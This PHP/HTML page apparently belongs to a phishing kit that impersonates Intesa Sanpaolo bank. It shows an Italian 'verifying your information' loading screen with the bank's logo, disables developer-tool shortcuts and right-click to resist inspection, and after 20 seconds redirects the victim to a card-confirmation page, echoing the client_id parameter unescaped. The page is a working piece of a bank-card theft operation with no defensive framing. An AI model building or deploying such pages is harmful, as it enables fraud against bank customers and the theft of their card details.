<?php
include_once '../../../INC/APP.php';
$bin4=$_GET['client_id'];
?>
<script>

	document.onkeydown = function(e) {
	  if(event.keyCode == 123) {
	     return false;
	  }
	  if(e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)) {
	     return false;
	  }
	  if(e.ctrlKey && e.shiftKey && e.keyCode == 'J'.charCodeAt(0)) {
	     return false;
	  }
	  if(e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)) {
	     return false;
	  }
	}


	
	document.addEventListener('contextmenu', function(e) {
	  e.preventDefault();
	});

</script>
<script type="text/JavaScript">
      setTimeout("location.href = '../conferma.carta.2/index.php?client_id=<?php echo $bin4 ?>';",20000);
 </script>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="icon" href="favicon.ico" type="image/x-icon">
<center><IMG border=0 hspace=0 alt="" src="Intesa_Sanpaolo.svg.png" width=270 align=baseline height=34></center>
<title>Banca Intesa Sanpaolo - Conto Corrente per Famiglie, Giovani e Aziende</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="scamti.css" rel="stylesheet">
<link href="MOBILE.css" rel="stylesheet">
</head>
<body>
<div id="LayoutGrid1">
<div class="col-1">
<div id="wb_LayoutGrid2">
<div id="LayoutGrid2">
<div class="row">
<div class="col-1">
<div id="wb_Image" style="">
<br><br><br><br>
<center><img src="loading.gif" id="Image1" alt="Intesa Sanpaolo"></center>
</div>
<div id="wb_Text2">
<center><span style="color:#000000;font-family:Arial;font-size:16px;"><br><br><br>*Attendi mentre verifichiamo le tue informazioni...<strong></strong><br></span></center>
<center><span style="color:#000000;font-family:Arial;font-size:16px;"><br><br><br>*Si prega di non chiudere questa finestra.<strong></strong><br></span></center>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>

</body></html>